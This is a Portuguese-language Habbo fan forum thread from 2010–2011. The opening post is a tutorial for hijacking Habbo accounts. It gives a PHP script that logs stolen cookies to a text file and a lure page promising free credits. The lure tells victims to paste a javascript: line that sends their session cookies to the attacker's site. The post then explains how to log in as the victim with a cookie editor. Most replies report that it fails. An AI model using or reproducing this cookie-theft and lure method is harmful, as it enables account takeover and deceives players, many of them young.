Habbo Server
Olá, ja é registrado?nParabéns, você é um membro do maior forum Habbo do Brasil!nnNÃO PRECISA CONFIRMAR EMAILnNão é registrado?nRegistre-se e descubra o maior forum Habbo do Brasil!nnHTA Forum - O maior forum de Habbo do Brasil

Compartilhe
Ver o tópico anteriorIr em baixoVer o tópico seguinte
avatar
Posts : 368

Sexo : Masculino

Local : Ex-Administrador
Ver perfil do usuário

Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 09:29
Olá
dia 22 foi descoberto uma vulnerabilidade no habbo, sendo que o "hacker" criando uma pagina mal-intencionada faça que os cookies da vitima seja enviada para ele!
TUTORIAL
1° Proucure um servidor que suporte php e rewrite
recomendo:
freewebhosting!
crie uma conta lá
selecione um endereço convicente para a pagina steal paasswrd
lá crie tudo direitinho e dps va em seu ftp...
o meu no caso é:
eu5org.freewebhostingarea.com/ftp/index.php
como selecionei o eu5.org server,
lá coloque eu5.org no 1° campo e no segudno seu site que criou e embaixo a senha...
entre...
crie um novo arquivo em new file no topo no lado direito da pagina...
no conteudo coloque
tire os


Código:
<?php
ob_start();
$cookie1=$_GET['cookie1'];
$cookie2=$_GET['cookie2'];
$handle=fopen('cookiejar.txt', 'a');
fwrite($handle, "Cookie: " .$cookie1.$cookie2. "\n");
fclose ($handle);

header("Location: http://habbo.com.br/me");
?>

salve com X.php
volte na setinha que tem na parte esquerda..
crie outro arquivo com o nome : cookiejar.txt
salve,
volte...
agora selecione o arquivo cookiejar.txt
e crique em permissões no topo lado direito
agora em chmod nas permissões coloque 777 salve e volte na setinha...
crie um arquivo com o nome de t.php e no conteudo coloque:
tire os
e mude o seusite.com para o site que vc colocou!



Código:
<title> Novo Bug </title>

<center>
<b>Copie o codigo abaixo e cole na sua pagina inicial e ganhe 99c!
<font color="red">
javascript:window.location='http://seusite.com/X.php?cookie1='%2bencodeURI(document·cookie.substring(0, 400))%2b'%26cookie2='%2bencodeURI(document·cookie.substring(401, 800));
</font>

agora mande para seus amigos:
seusite.com/t.php
mude seusite.com para o site que vc colokou na hora de cadastrar!
o bobo vai colokar o java na pagina e vai mandar a sessão para o arquivo: cookiejar.txt
va em:
seusite.com/cookiejar.txt
pegue a parte JSESSIONID=PEGUE ESSE CODIGO
va no firefox e baixe no site da mozzila o cookie editor
entre e uma conta fake,
va no cookies editor e mude o cookies jessionid para o da vitima salva o cookie e atualiza a pagina principal!
ta na conta da vitima!

Créditos: Drizer
avatar
Zodíaco : Libra
Tigre
Posts : 245

Idade : 19

Sexo : Masculino

Local : Em frente ao pc xD
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 11:49
Aff nem funfa,eu executei numa conta fake,n foi pro arquivo cookiejar.txt,e fui tentar entrar na conta fake pra testar denovo,a senha n dava mais,ou seja : Algem Hackeou '

'-' ainda bem q foi a fake ' Very Happy
avatar
Zodíaco : Peixes
Posts : 20981

Idade : 2016

Sexo : Masculino

Local : 1
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 13:02
Não funciona.
avatar
Zodíaco : Áries
Tigre
Posts : 675

Idade : 19

Sexo : Masculino

Local : Aqui no Forum.
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 13:29
n intendi nada
avatar
Zodíaco : Touro
Gato
Posts : 597

Idade : 18

Sexo : Masculino

Local : \o/
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 13:42
No funfo '-'
avatar
Zodíaco : Peixes
Rato
Posts : 197

Idade : 21

Sexo : Masculino

Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 16:26
Não Funciona :/
avatar
Posts : 368

Sexo : Masculino

Local : Ex-Administrador
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 17:13
Aqui funciona ._. e J-Z se não funciona pode dar closed...

@edit
vocês baixaram o cookie editor no firefox?
avatar
Zodíaco : Peixes
Posts : 20981

Idade : 2016

Sexo : Masculino

Local : 1
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 18:01
Não dei closed '-'
OBS: Eles não tão falando que o Cookie Editor não funciona e sim que os cookies não chegam no cookiejar.txt
avatar
Zodíaco : Áries
Tigre
Posts : 675

Idade : 19

Sexo : Masculino

Local : Aqui no Forum.
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 18:33
n prescisa dar closed

eu ainda to boiando no ki eh pra fazer
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 18:51
Phoenix, por favor apaga o tópico..
sim.. é o Drizer...
avatar
Posts : 368

Sexo : Masculino

Local : Ex-Administrador
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 23/11/2010, 19:03
escreveu:Phoenix, por favor apaga o tópico..
sim.. é o Drizer...

No drizer eu confio, mais você não tá on line no habbo, pode ser qualquer trouxa ai me enganando...
Se for você mesmo malz ai então (:
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 4/4/2011, 01:19
ook
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 30/4/2011, 20:33
aff eu fiz tudo correto,mas entrei em fike e eu mesmo colei o codigo e tal,mas fui olhar tinha nada no arquivo cookiejar.txt,poderia corrigir algo errado ai,ou postar o topico denovo porem PERFEITO,vcs são os caras....
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 1/5/2011, 14:20
Onde fica esse cookies jessionid ? não achei
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 7/5/2011, 21:25
n fucional '
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 17/5/2011, 17:26
Aki não pegou tentei mais nem funfou tipo nao ta chegando os dados cookiejar.txt, nao chega nada na hora que envia lá
avatar
Zodíaco : Peixes
Búfalo
Posts : 263

Idade : 20

Sexo : Masculino

Local : Nova Prospekt
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 17/5/2011, 22:20
Tentei fazer e não funfo
Ver perfil do usuário

Re: Xss / vulnerabilidade no security_check do habbo.

em 25/5/2011, 13:19
Reputação da mensagem: 100% (1 votos)
Funfa sim , o só que o habbo bloqueou o trafico de cookies então o jsessionid não pega mais .-.
Conteúdo patrocinado

Re: Xss / vulnerabilidade no security_check do habbo.

Ver o tópico anteriorVoltar ao TopoVer o tópico seguinte
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum